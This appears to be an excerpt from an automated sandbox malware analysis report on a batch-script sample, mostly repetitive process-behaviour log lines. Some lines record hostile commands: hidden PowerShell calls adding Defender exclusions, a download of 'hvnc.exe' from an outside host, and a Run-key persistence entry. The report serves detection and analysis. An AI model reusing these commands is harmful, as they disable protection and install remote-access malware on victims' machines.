            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4676Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6020Thread sleep count: 4228 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5396Thread sleep count: 2648 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2072Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1292Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: RuntimeBroker.exe, 0000000B.00000002.3302940891.000000001C502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllScrip
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Yara detected Powershell download and execute
            Source: Yara matchFile source: temp_script.bat, type: SAMPLE
            Source: Yara matchFile source: amsi64_2284.amsi.csv, type: OTHER
            Adds a directory exclusion to Windows Defender
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cacls.exe "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', 'C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe')"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker' -Value '"C:\Users\user\AppData\Roaming\RuntimeBroker.exe"' -PropertyType 'String'Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker' -value '"c:\users\user\appdata\roaming\runtimebroker.exe"' -propertytype 'string'
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" remove-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker';new-itemproperty -path 'hkcu:\software\microsoft\windows\currentversion\run' -name 'runtimebroker' -value '"c:\users\user\appdata\roaming\runtimebroker.exe"' -propertytype 'string'Jump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
